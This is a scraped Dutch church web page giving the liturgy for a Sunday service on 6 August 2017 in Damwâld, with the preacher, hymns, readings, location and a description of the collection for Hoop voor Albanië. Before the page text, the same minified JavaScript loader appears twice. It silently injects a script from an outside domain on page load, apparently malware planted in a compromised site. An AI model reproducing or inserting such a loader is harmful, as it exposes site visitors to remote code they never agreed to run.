;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 6 augustus 2017 9:30 uur - PKN Damwâld
zondag 6 augustus 2017
09:30 uur

Kerkdienst zondag 6 augustus 2017 9:30 uur

Informatie

Voorganger:Ds. J. Bakker, Feanwâlden
Organist:Jaap van der Horn
Liturgie
Lied voor de dienst Gezang 1
Welkom en mededelingen
We zingen: Psalm 84: 1 en 2
Stilgebed, Bemoediging en Groet .
enkele verzen uit Psalm 84, gelezen
We zingen: Psalm 84: 6
gebed om ontferming .
We zingen: Gezang 21: 1,3 en 7
gebed van de zondag .
1ste schriftlezing Zacharia 9, 9-12
We zingen: Gezang 326: 1 en 2
2de schriftlezing Mattheüs 11, 25-30
We zingen: Gezang 326: 5
Preek .
We zingen: Gezang 330
gebeden, stil gebed en Onze Vader .
Collecte
Slotlied Gezang 252
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Hoop voor Albanië

Hoop voor Albanië is al meer dan twintig jaar actief in Albanië. De stichting heeft als doel om de minderbedeelden, armen en zwakken van de Albanese samenleving te helpen. Zij doen dit in het groot. Kijk bijvoorbeeld naar het enorme bouwproject in Korca. Zij hebben daar een bejaardenhuis gebouwd, waar nu een twintigtal ouderen wonen. Maar zij doen dat ook vaak in het klein, voor één gezin of persoon. Zij proberen altijd de lokale bevolking, kerken en organisaties in te schakelen en vooral ondersteunend aan het werk te gaan. Zij steunen ook een aantal permanente projecten en initiatieven, bijvoorbeeld Seed of Hoop. Vandaag is de collecte bestemd voor een nieuw kerkgebouw voor de Mushqeta regio.

Tweede collecte: Kerk
Uitganscollecte: Kerk